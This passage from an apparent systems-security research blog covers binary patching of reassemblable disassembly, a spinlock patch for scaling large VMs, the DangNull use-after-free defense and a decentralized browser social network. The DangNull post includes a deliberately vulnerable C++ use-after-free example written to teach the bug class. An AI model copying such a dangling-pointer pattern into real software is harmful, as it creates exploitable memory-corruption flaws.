<span class="n">A80001006</span><span class="o">:</span><span class="w"> </span><span class="n">.byte</span><span class="w"> </span><span class="mh">0x22</span>
<span class="n">A80001007</span><span class="o">:</span><span class="w"> </span><span class="n">.byte</span><span class="w"> </span><span class="mh">0x22</span>
<span class="n">A80001008</span><span class="o">:</span><span class="w"> </span><span class="n">A80000011</span><span class="w"> </span><span class="o">/*</span><span class="w"> </span><span class="p">{</span><span class="n">xref</span><span class="o">:</span><span class="p">[</span><span class="s">'A800000ff'</span><span class="p">]}</span><span class="w"> </span><span class="o">*/</span>
<span class="n">A8000100c</span><span class="o">:</span><span class="w"> </span><span class="n">A80000022</span>
<span class="n">A80001010</span><span class="o">:</span><span class="w"> </span><span class="n">A80000033</span>
</code></pre></div>
<p>For example, <code>A80001008</code> might be a jump table and
<code>A80001002</code> might be a global variable that was initialized with
a function pointer (<code>A80000000</code>). The global variable was accessed by
an instruction at <code>0x800000ee</code> (in its original binary) and the jump
table was access by <code>0x800000ff</code>.</p>
<p>5) Oddities</p>
<p>There are few oddities that we couldn't easily imagine at the first
glance. For example, SSE instructions (xmm in x86) require 16-byte
alignment of its operands, a data pointer. So, whenever we meet xmm
instructions, we enforce its alignment on the data section.</p>
<div class="highlight"><pre><span></span><code><span class="n">.section</span><span class="w"> </span><span class="n">.data</span>
<span class="n">.align</span><span class="w"> </span><span class="m">16</span><span class="w"> </span>
<span class="n">A80001000</span><span class="o">:</span><span class="w"> </span><span class="n">.byte</span><span class="w"> </span><span class="mh">0x00</span><span class="w"> </span><span class="o">/*</span><span class="w"> </span><span class="p">{</span><span class="n">xref</span><span class="o">:</span><span class="p">[</span><span class="s">'A800000ff'</span><span class="p">]}</span><span class="w"> </span><span class="o">*/</span>
<span class="n">A80001001</span><span class="o">:</span><span class="w"> </span><span class="n">.byte</span><span class="w"> </span><span class="mh">0x11</span>
<span class="n">A80001001</span><span class="o">:</span><span class="w"> </span><span class="n">.byte</span><span class="w"> </span><span class="mh">0x22</span>
<span class="n">A800000ff</span><span class="o">:</span><span class="w"> </span><span class="n">movsd</span><span class="w"> </span><span class="n">A80001000</span><span class="p">,</span><span class="w"> </span>%<span class="n">xmm1</span>
</code></pre></div>
<h2>Binary Patching</h2>
<p>In fact, the goal of having this pipeline of producing relocatable,
reassemblable disassembly is to make the binary patching easy (e.g.,
no trempoline, no crafting to make a room for patches &c), and more
importantly human-readable (and handy analysis). For example,
we could easily detect well-known code gadgets (say, <code>malloc()</code>) and
then symbolize them (adding a label <code>func_malloc:</code> to the beginning of
the gadget). Then, that patch (e.g., cfi, safe stack &c) can
easily reuse such code or a library. Since the disassembly is
relocatable, inserting new code (patch) or transforming
do not require special cares to the disassembly, and open new
possibility of applying well-understood optimization techniques like
dead-code/data elimination or peephole optimization.</p>Do Virtual Machines Really Scale?2015-05-21T11:40:00+02:002015-02-10T10:10:00+01:00Sanidhya Kashyaptag:gts3.org,2015-05-21:/2015/cloud-scalability.html<p>Scalability of Virtual Machines</p><h1>The "Monster" VMs</h1>
<p>Today, cloud service providers are provisioning VMs with high core
count coupled with lots of memory; for example, Microsoft Azure
provides a largest (aka baby monster) VM instance consisting of
32 vCPUs with 488 GBs of RAM. Similar configurations
are also available with other cloud service providers such as Amazon EC2
and Google Compute Engine (GCE). With the help of these instances,
the cloud service providers are trying to focus on applications that require
large amount of memory with lots of computation. Some examples include
big-data processing and in-memory databases (such as SAP HANA).
The provisioning of such large VMs has been made possible because of
the ease of availability of
cost-effective, large multicore machines and this trend will continue
as the number of cores increase per commodity CPUs (e.g., up to 1K
cores in SPARC M7).</p>
<p>But, the questions that we would like to answer are the following:</p>
<ul>
<li>What is the scalability characteristics of the large VM instances
provided by the cloud service providers?</li>
<li>Is the underlying virtualization technology really scalable enough
to support a VM with hundreds of vCPUs in the future?</li>
</ul>
<p>We try to answer the aforementioned questions in the following
sections by running a Linux kernel compile, an embarrassingly
parallel job that end users might expect to scale vertically, on
popular cloud services and then replicate the same experiment on
our 80-core machine to project the scalability trend.</p>
<h2>1) Cloud Scalability</h2>
<p><img src="/blog/vbench/clouds.svg" alt="Clouds" width="70%" /></p>
<p>We executed the Linux kernel compile on three popular cloud service
providers - Amazon EC2, Google Compute Engine and Microsoft Azure.
We can observe that all the VMs are clearly scalable till 16 vCPUs
and there is a degradation after 16 vCPUS for both EC2 and GCE instances.
This occurs due to the usage of hyperthreads for the 32 vCPUs VMs.
We confirm this same behavior by running the same experiment in our
lab with a 16-core E5-2630 v3 machine having similar configuration
used by these cloud service providers. Interestingly, Azure scales well beyond
16 cores, reflecting next to ideal scalability characteristics. We believe
that this happens because they use more physical cores than the logical
ones.</p>
<h2>2) Monster VMs and their scalability characteristics</h2>
<p><img src="/blog/vbench/160core.svg" alt="160core" width="70%" /></p>
<p>We replicate the same experiment on our 80-core E7-8870 machine
by performing the experiment on two kinds of VMs - first one
is the highly optimized paravirtulized VM (PVM) and another one
is the hardware assisted VM (HVM). Theoretically, the performance
of PVM should be similar or better than HVM. But, this trend
tends to break when the vCPU count increases from 20 vCPUS. This
problem is counter intuitive and is only observed in case of vCPUs
being greater than 20 physical cores. We classify this problem as
<strong>sleepy lock anomaly</strong>, which occurs due to the usage of
paravirtual interface in the ticket spinlock implementation that
has been introduced to solve the <a href="http://www.betriebssysteme.org/Aktivitaeten/Treffen/2008-Garching/Programm/docs/Abstract_Friebel.pdf" title="How to Deal with Lock Holder Preemption Problem">Lock Holder Preemption problem</a>
without the architectural support (i.e. <a href="http://www.intel.com/Assets/en_US/PDF/manual/253669.pdf" title="Intel 64 and IA-32 Architectures Software Developer's Manual">Pause Loop Exiting</a>).</p>
<p>Currently, paravirtual interface complements the PLE and helps in boosting
the performance when compared against HVM. During the lock acquisition,
a lock waiter first spins a lock for fix loop-iteration (fast path), and if
it fails to acquire the lock, it voluntarily yields to other vCPUS by issuing
a <code>halt</code> instruction (slow path). When a lock is released, the next waiter
is woken up (by kicking the next waiting vCPU based on the ticket value).
However, the above figure illustrates the sudden performance drop which
occurs due to the sudden increase in <code>halt</code> exits from 30th core onwards). This
happens due to the high contention among the vCPUs where they are contending
with each other. This drastically increases the time period of lock acquisition,
resulting in failure of the lock acquisition by most vCPUs and they start
trapping to the hypervisor at the same time. From this point, the communication
cost to wake up other vCPU starts dominating which results in performance
collapse.</p>
<h3>Our Fix</h3>
<p>To solve this issue for the virtualized instance, we design and implement
a variant of spinlock, called opportunistic ticket spinlock (<code>oticket</code>)
that exploits the <em>distance</em> between the lock holder and lock waiter as
the time to acquire a lock is roughly proportional to the waiters's
distance for the ticket spinlock implementation. We introduce two
new schemes to tackle the performance degradation:</p>
<ul>
<li>Opportunistic spinning: Determining spin duration in the fast path
is dependent on the workload and hardware configuration. During the
lock phase, we dynamically determine the spin duration by relying on
the distance information
between the lock waiter and its holder. Nearer waiters opportunistically
spin for a longer duration, hoping to avoid the costly switching between
the guest OS and the hypervisor. Conversely, farther waiters spin for
shorter duration and they yield early to give more chance for a lock
holder to make progress.</li>
<li>Opportunistic wake-up: In this scheme, during the unlocking phase,
next N waiters are woken up. This approach amortizes the vCPU wake-up
latency which is experienced in case of virtualized environment.</li>
</ul>
<p>Following is the modified code snippet of the paravirtual spinlock
implementation in the Linux kernel version 4.0:</p>
<div class="highlight"><pre><span></span><code><span class="mi">1</span><span class="w"> </span><span class="err">#</span><span class="n">define</span><span class="w"> </span><span class="n">SPIN_THRESHOLD</span><span class="w"> </span><span class="p">(</span><span class="mi">1</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">15</span><span class="p">)</span>
<span class="mi">2</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="err">#</span><span class="n">define</span><span class="w"> </span><span class="n">SPIN_MAX_THRESHOLD</span><span class="w"> </span><span class="p">(</span><span class="mi">1UL</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">34</span><span class="p">)</span>
<span class="mi">3</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="err">#</span><span class="n">define</span><span class="w"> </span><span class="n">TICKET_QUEUE_WAIT</span><span class="w"> </span><span class="p">(</span><span class="mi">18</span><span class="p">)</span>
<span class="mi">4</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="err">#</span><span class="n">define</span><span class="w"> </span><span class="n">EAGER_WAKEUP_NCPU</span><span class="w"> </span><span class="p">(</span><span class="mi">4</span><span class="p">)</span>
<span class="mi">5</span>
<span class="mi">6</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="n">__always_inline</span>
<span class="mi">7</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">__ticket_distance</span><span class="p">(</span><span class="n">__ticket_t</span><span class="w"> </span><span class="n">head</span><span class="p">,</span><span class="w"> </span><span class="n">__ticket_t</span><span class="w"> </span><span class="n">tail</span><span class="p">)</span>
<span class="mi">8</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">{</span>
<span class="mi">9</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="n">tail</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="p">(</span><span class="n">head</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="o">~</span><span class="n">TICKET_SLOWPATH_FLAG</span><span class="p">))</span><span class="w"> </span>\
<span class="mi">10</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="n">TICKET_LOCK_INC</span><span class="p">;</span>
<span class="mi">11</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">}</span>
<span class="mi">12</span>
<span class="mi">13</span><span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="n">__always_inline</span>
<span class="mi">14</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="n">arch_spin_lock</span><span class="p">(</span><span class="n">arch_spinlock_t</span><span class="w"> </span><span class="o">*</span><span class="n">lock</span><span class="p">)</span>
<span class="mi">15</span><span class="w"> </span><span class="p">{</span>
<span class="mi">16</span><span class="w"> </span><span class="k">register</span><span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">__raw_tickets</span><span class="w"> </span><span class="n">inc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{.</span><span class="n">tail</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">TICKET_LOCK_INC</span><span class="p">};</span>
<span class="mi">17</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">dist</span><span class="p">;</span>
<span class="mi">18</span>
<span class="mi">19</span><span class="w"> </span><span class="cm">/* default threshold set in Linux */</span>
<span class="mi">20</span><span class="w"> </span><span class="n">u64</span><span class="w"> </span><span class="n">threshold</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SPIN_THRESHOLD</span>
<span class="mi">21</span>
<span class="mi">22</span><span class="w"> </span><span class="cm">/* try locking */</span>
<span class="mi">23</span><span class="w"> </span><span class="n">inc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">xadd</span><span class="p">(</span><span class="o">&</span><span class="n">lock</span><span class="o">-></span><span class="n">tickets</span><span class="p">,</span><span class="w"> </span><span class="n">inc</span><span class="p">);</span>
<span class="mi">24</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">likely</span><span class="p">(</span><span class="n">inc</span><span class="p">.</span><span class="n">head</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">inc</span><span class="p">.</span><span class="n">tail</span><span class="p">))</span>
<span class="mi">25</span><span class="w"> </span><span class="k">goto</span><span class="w"> </span><span class="n">out</span><span class="p">;</span>
<span class="mi">26</span>
<span class="mi">27</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="cm">/* opportunistically determines spinning threshold */</span>
<span class="mi">28</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">dist</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">__ticket_distance</span><span class="p">(</span><span class="n">inc</span><span class="p">.</span><span class="n">head</span><span class="p">,</span><span class="w"> </span><span class="n">inc</span><span class="p">.</span><span class="n">tail</span><span class="p">);</span>
<span class="mi">29</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">dist</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">TICKET_QUEUE_WAIT</span><span class="p">)</span>
<span class="mi">30</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">threshold</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SPIN_MAX_THRESHOLD</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="p">(</span><span class="n">dist</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">);</span>
<span class="mi">31</span>
<span class="mi">32</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(;;)</span><span class="w"> </span><span class="p">{</span>
<span class="mi">33</span><span class="w"> </span><span class="cm">/* spinning (fast path) */</span>
<span class="mi">34</span><span class="w"> </span><span class="n">u64</span><span class="w"> </span><span class="n">count</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">threshold</span><span class="p">;</span>
<span class="mi">35</span><span class="w"> </span><span class="k">do</span><span class="w"> </span><span class="p">{</span>
<span class="mi">36</span><span class="w"> </span><span class="n">inc</span><span class="p">.</span><span class="n">head</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">READ_ONCE</span><span class="p">(</span><span class="n">lock</span><span class="o">-></span><span class="n">tickets</span><span class="p">.</span><span class="n">head</span><span class="p">);</span>
<span class="mi">37</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">__tickets_equal</span><span class="p">(</span><span class="n">inc</span><span class="p">.</span><span class="n">head</span><span class="p">,</span><span class="w"> </span><span class="n">inc</span><span class="p">.</span><span class="n">tail</span><span class="p">))</span>
<span class="mi">38</span><span class="w"> </span><span class="k">goto</span><span class="w"> </span><span class="n">clear_slowpath</span><span class="p">;</span>
<span class="mi">39</span><span class="w"> </span><span class="n">cpu_relax</span><span class="p">();</span>
<span class="mi">40</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="o">--</span><span class="n">count</span><span class="p">);</span>
<span class="mi">41</span>
<span class="mi">42</span><span class="w"> </span><span class="cm">/* yield (slow path) */</span>
<span class="mi">43</span><span class="w"> </span><span class="n">__ticket_lock_spinning</span><span class="p">(</span><span class="n">lock</span><span class="p">,</span><span class="w"> </span><span class="n">inc</span><span class="p">.</span><span class="n">tail</span><span class="p">);</span>
<span class="mi">44</span><span class="w"> </span><span class="p">}</span>
<span class="mi">45</span>
<span class="mi">46</span><span class="w"> </span><span class="n">clear_slowpath</span><span class="o">:</span>
<span class="mi">47</span><span class="w"> </span><span class="n">__ticket_check_and_clear_slowpath</span><span class="p">(</span><span class="n">lock</span><span class="p">,</span><span class="w"> </span><span class="n">inc</span><span class="p">.</span><span class="n">head</span><span class="p">);</span>
<span class="mi">48</span><span class="w"> </span><span class="n">out</span><span class="o">:</span>
<span class="mi">49</span><span class="w"> </span><span class="n">barrier</span><span class="p">();</span>
<span class="mi">50</span><span class="w"> </span><span class="p">}</span>
<span class="mi">51</span>
<span class="mi">52</span><span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="n">__always_inline</span>
<span class="mi">53</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="n">arch_spin_unlock</span><span class="p">(</span><span class="n">arch_spinlock_t</span><span class="w"> </span><span class="o">*</span><span class="n">lock</span><span class="p">)</span>
<span class="mi">54</span><span class="w"> </span><span class="p">{</span>
<span class="mi">55</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">TICKET_SLOWPATH_FLAG</span><span class="w"> </span><span class="o">&&</span>
<span class="mi">56</span><span class="w"> </span><span class="n">static_key_false</span><span class="p">(</span><span class="o">&</span><span class="n">paravirt_ticketlocks_enabled</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="mi">57</span><span class="w"> </span><span class="n">__ticket_t</span><span class="w"> </span><span class="n">head</span><span class="p">;</span>
<span class="mi">58</span>
<span class="mi">59</span><span class="w"> </span><span class="n">head</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">xadd</span><span class="p">(</span><span class="o">&</span><span class="n">lock</span><span class="o">-></span><span class="n">tickets</span><span class="p">.</span><span class="n">head</span><span class="p">,</span><span class="w"> </span><span class="n">TICKET_LOCK_INC</span><span class="p">);</span>
<span class="mi">60</span>
<span class="mi">61</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">head</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="n">TICKET_SLOWPATH_FLAG</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="mi">62</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="n">count</span><span class="p">;</span>
<span class="mi">63</span><span class="w"> </span><span class="n">head</span><span class="w"> </span><span class="o">&=</span><span class="w"> </span><span class="o">~</span><span class="n">TICKET_SLOWPATH_FLAG</span><span class="p">;</span>
<span class="mi">64</span>
<span class="mi">65</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="cm">/* opportunistic wakeup */</span>
<span class="mi">66</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">count</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"> </span><span class="n">count</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="n">EAGER_WAKEUP_NCPU</span><span class="p">;</span><span class="w"> </span><span class="o">++</span><span class="n">count</span><span class="p">)</span>
<span class="mi">67</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">__ticket_unlock_kick</span><span class="p">(</span><span class="n">lock</span><span class="p">,</span>
<span class="mi">68</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">head</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">count</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">TICKET_LOCK_INC</span><span class="p">));</span>
<span class="mi">69</span><span class="w"> </span><span class="p">}</span>
<span class="mi">70</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span>
<span class="mi">71</span><span class="w"> </span><span class="n">__add</span><span class="p">(</span><span class="o">&</span><span class="n">lock</span><span class="o">-></span><span class="n">tickets</span><span class="p">.</span><span class="n">head</span><span class="p">,</span>
<span class="mi">72</span><span class="w"> </span><span class="n">TICKET_LOCK_INC</span><span class="p">,</span><span class="w"> </span><span class="n">UNLOCK_LOCK_PREFIX</span><span class="p">);</span>
<span class="mi">73</span><span class="w"> </span><span class="p">}</span>
</code></pre></div>
<h3>Performance comparison</h3>
<p><img src="/blog/vbench/oticket.svg" alt="oticket" width="70%" /></p>
<p>In the above figure, we compare our <code>oticket</code> implementation with
the stock ticket spinlock implementation and another implementation
known as <a href="https://lkml.org/lkml/2015/4/24/631" title="qspinlock: a 4-byte queue spinlock with PV support">qspinlock</a>. qspinlock is the queue based spinlock for further
reducing the cacheline contention.
We can clearly observe that <code>oticket</code> outperforms PVM and it shows the
same scalability trend that can be observed in case of HVM. The qspinlock
performs almost the same as of PVM. This happens because
qspinlock lock implementation also relies on fast path and slow path approach,
thereby suffering from the same sleepy lock anomaly as that of PVM.</p>
<p><img src="/blog/vbench/oversubscribed.svg" alt="Oversubscribed" width="70%" /></p>
<p>The above figure illustrates the performance of Linux kernel compilation time
inside a VM which has been co-scheduled with other VM. Both VMs are compiling the
Linux kernel simultaneously. We compare our <code>oticket</code> implementation against
the existing stock version (PVM). We can observe that <code>oticket</code> still outperforms
the PVM, but it also suffers from performance collapse after 40 vCPUS. We suspect
that the both PLE and <code>oticket</code> are counteracting each other in oversubscribed
environment.</p>
<h2>Conclusion</h2>
<p>We have taken a step to analyze the scalability behavior of VMs
with high core count (till 80 core). Our preliminary study suggests that besides cache contention
bottleneck, the usage of ticket spinlock is another culprit for the degradation.
We will take a step further and will try to analyze the scalability characteristics
of these monster VMs by running other benchsuites from Mosbench.</p>Dangling Pointers Nullification to Prevent Use-after-free2015-04-11T10:10:00+02:002015-04-11T10:10:00+02:00Byoungyoung Leetag:gts3.org,2015-04-11:/2015/dang-null.html<p>Nullify dangling pointers to stop use-after-free.</p><h1>Memory corruption and use-after-free</h1>
<p>Many system components are written in the unsafe C/C++ languages that are prone
to memory corruption vulnerabilities. Over more than 20 years,
attackers have been abusing these vulnerabilities to compromise and subvert the
system. Of course there have been much of defense side research efforts to stop
these issues, but it is not quite close to be perfect --- many of them take
too radical approaches so it involves either the changes of the
underlying running system or is not quite suitable for real-world applications.</p>
<p>Today, use-after-free is generally known as one of the most difficult
vulnerability type. Many modern C/C++ applications are developed under
object-oriented or event-driven designs, which in turn separates out the memory
resource <code>use</code> and <code>free</code> patterns. Due to this separation, developers cannot
easily understand whether a certain memory pointer may point to a valid memory
object or not, and a use-after-free vulnerability is introduced if they
misunderstand. From the perspective of static analysis, use-after-free is a
still challenging problem with a similar reason --- separated use and free
routines require a precise points-to analysis with a complete inter-procedural
analysis.</p>
<h1>DangNull: Nullifying dangling pointers</h1>
<h3>Use-after-free example</h3>
<div class="highlight"><pre><span></span><code><span class="k">class</span><span class="w"> </span><span class="nc">Div</span><span class="o">:</span><span class="w"> </span><span class="n">Element</span><span class="p">;</span>
<span class="k">class</span><span class="w"> </span><span class="nc">Body</span><span class="o">:</span><span class="w"> </span><span class="n">Element</span><span class="p">;</span>
<span class="k">class</span><span class="w"> </span><span class="nc">Document</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">Element</span><span class="o">*</span><span class="w"> </span><span class="n">child</span><span class="p">;</span>
<span class="p">};</span>
<span class="c1">// (a) memory allocations</span>
<span class="n">Document</span><span class="w"> </span><span class="o">*</span><span class="n">doc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">Document</span><span class="p">();</span>
<span class="n">Body</span><span class="w"> </span><span class="o">*</span><span class="n">body</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">Body</span><span class="p">();</span>
<span class="n">Div</span><span class="w"> </span><span class="o">*</span><span class="n">div</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">Div</span><span class="p">();</span>
<span class="c1">// (b) using memory: propagating pointers</span>
<span class="n">doc</span><span class="o">-></span><span class="n">child</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">body</span><span class="p">;</span>
<span class="n">body</span><span class="o">-></span><span class="n">child</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">div</span><span class="p">;</span>
<span class="c1">// (c) memory free: doc->child is now dangled</span>
<span class="k">delete</span><span class="w"> </span><span class="n">body</span><span class="p">;</span>
<span class="c1">// (d) use-after-free: dereference the dangled pointer</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">doc</span><span class="o">-></span><span class="n">child</span><span class="p">)</span>
<span class="w"> </span><span class="n">doc</span><span class="o">-></span><span class="n">child</span><span class="o">-></span><span class="n">getAlign</span><span class="p">();</span>
</code></pre></div>
<p>Above code snippet shows a contrived example having use-after-free issues. A
pointer <code>doc->child</code> points to the invalid memory region after <code>body</code> is
deleted. Thus, <code>doc->child</code> is a dangling pointer, and use-after-free occurs
once the pointer <code>doc->child</code> is dereferenced.</p>
<p>Use-after-free could have been prevented if all the pointers pointing to the
object to be freed are properly nullified (e.g., nullifying <code>doc->child</code> once
<code>body</code> is deleted). However, such nullification is not straightforward for
developers because <code>doc->child</code> is essentially a back-pointer to <code>body</code> and a
list of back-pointers are known when the object is freed.</p>
<h3>Nullifying dangling pointers</h3>
<p>Motivated by this hardness for developers, we developed <code>DangNull</code> that
automatically nullifies all potential dangling pointers and thus prevents
use-after-free. By instrumenting additional code and maintaining extra
metadata, it can trace object relationships via pointers and nullifies the
pointers once it is dangled. For example, the above vulnerable code will be
transformed into the code like below.</p>
<div class="highlight"><pre><span></span><code><span class="n">doc</span><span class="o">-></span><span class="n">child</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">body</span><span class="p">;</span>
<span class="o">+</span><span class="w"> </span><span class="n">trace</span><span class="p">(</span><span class="o">&</span><span class="n">doc</span><span class="o">-></span><span class="n">child</span><span class="p">,</span><span class="w"> </span><span class="n">body</span><span class="p">);</span>
<span class="n">body</span><span class="o">-></span><span class="n">child</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">div</span><span class="p">;</span>
<span class="o">+</span><span class="w"> </span><span class="n">trace</span><span class="p">(</span><span class="o">&</span><span class="n">body</span><span class="o">-></span><span class="n">child</span><span class="p">,</span><span class="w"> </span><span class="n">div</span><span class="p">);</span>
<span class="c1">// delete operator is intercepted,</span>
<span class="c1">// and all back-pointers including doc->child are nulified.</span>
<span class="k">delete</span><span class="w"> </span><span class="n">body</span><span class="p">;</span>
<span class="c1">// doc->child is NULL, so use-after-free is prevented.</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">doc</span><span class="o">-></span><span class="n">child</span><span class="p">)</span>
<span class="w"> </span><span class="n">doc</span><span class="o">-></span><span class="n">child</span><span class="o">-></span><span class="n">getAlign</span><span class="p">();</span>
</code></pre></div>
<p>While intercepting all allocations and deallocations, it also instruments an
extra runtime function call, <code>trace()</code>, to keep track of object relationships
via pointers. One interesting property of <code>DangNull</code> is in reusing null-pointer
checks in the program. Because the automatic nullification of dangling pointers
are actually the runtime semantics that developers intended and had to
implement, <code>DangNull</code> fills up the missing semantic hole and keeps the program
alive even after the use-after-free attempts. We have implemented this idea
using <code>LLVM</code> compiler infrastructures, and instrumented <code>the Chromium browser</code>
(please refer the paper [1] for details).</p>
<h3>Demo</h3>
<p>The following video clip shows the demo on Chromium hardened with DangNull. We
tested using a use-after-free exploit, <code>CVE-2013-2909</code>, and it shows how
DangNull stops the exploit --- it stops the exploit attempts by triggering a
segmentation fault due to null-dereference (we do a little bit more extra jobs to
safely contain this exception, which we call safe-null dereference). When the
nullification value is NULL, the Chromium browser can correctly render the
exploit page as if the vulnerability is patched.</p>
<center>
<video width="80%" controls>
<source src="https://tc.gtisc.gatech.edu/demo/2015/dangnull/demo.mp4" type="video/mp4">
</video>
</center>
<hr>
<p>[1] Preventing Use-after-free with Dangling Pointers Nullification. Byoungyoung
Lee, Chengyu Song, Yeongjin Jang, Tielei Wang, Taesoo Kim, Long Lu, Wenke Lee.
Published in NDSS 2015. [<a href="http://www.cc.gatech.edu/~blee303/paper/dangnull.pdf">PDF</a>]</p>Envisioning a Private, Decentralized In-browser Social Network2015-03-10T12:12:00+01:002015-03-10T12:12:00+01:00Yang Jitag:gts3.org,2015-03-10:/2015/deface.html<p>Discuss the motivation, challenges and prototype of a private, decentralized in-browser social network.</p><h1>Decentralized social network wanted</h1>
<p>People are getting more concerned with the safety of their personal data
stored at the social network service provider. Many privacy issues such as
private files leakage, manipulation of personal data without permission,
communication censorship have challenged the centralized architecture of
social network. The desire for an architecture where personal data are no
longer concentrated at a central server motivates the development of
decentralized social networks. Diaspora takes the first step by breaking the
centralized server down to a series of regional servers (<code>pods</code>). A user
registers at a pod that receives and delivers the messages for him. However,
the problem is "what if the user does not trust the pod?". More seriously,
users data at the pod are in plaintext, subject to easier access after attack.</p>
<p>Diaspora does provide an option with higher privacy protection: you can
set up your own pod that only serves yourself. If every user applies their own
pod, the decentralized social network could have been achieved. Unfortunately,
this has never come true. The convoluted installation procedure intimidates
most users. This is also true in mainstream P2P platforms such as Freenet,
Herbivore, and Kaleidoscope. Normal users can hardly install and maintain
these platforms without any technical support. This is the story five to ten
years ago. But can we do it now?</p>
<p>With today's advanced platform-neutral, web-based technologies, can we provide
the same level of usability in popular social network such as Facebook with
enhanced privacy protection? One notable advantage comes from the browser. We
believe the current built-in features in browsers are able to accommodate a
peer-to-peer network: much more than a simple client-side renderer, nowadays we
have WebRTC that enables inter-browser peer-to-peer data channels, and indexed
DB that provides persistency as key-value store.</p>
<h1>Design of an in-browser social network</h1>
<p>Only having P2P data channel and in-browser persistency is far from an
operatable social network. We need to design a client-side only logic that is
able to orchestrate the social network without a centralized entity.
Specifically, we need at least the following three schemes:
- A secure signaling and friendship exchange service for the peer-to-peer
network that offers both data security & privacy and high deploying
scalability.
- A mechanism to ensure timeline consistency of posts between sender and
receiver without any centralized authority.
- An efficient message delivery overlay network that delivers messages to both
online and offline friends with low latency.</p>
<p><img src="/blog/deface/overview.svg" alt="Overview" width="80%" /></p>
<h2>SAFE store</h2>
<p>The Signaling And Friendship Exchange (SAFE) service facilitates
peers to exchange friendship requests for establishing shared secrecy,
and also exchange network brokering information including metadata, IP
address and port number. As SAFE service only provides a platform for
peers to exchange information, this service can be hosted in a simple
key-value store. Each piece of exchanged data is formatted as
a typical <em>json</em> with the key to be only computable and
identifiable to the pair of friends. SAFE has no disclose to any user's
communication data, friends info, and even the ID. The design of SAFE
plays a key role to deliver a <em>private</em> social network.</p>
<h2>Timeline consistency</h2>
<p>Timeline consistency of messages is resolved by the receiver proactively. When
the messages are sent and the receiver
is offline, they are maintained in the DHT for a while using replication and
persistence. However, after the message time-to-live expires, the message
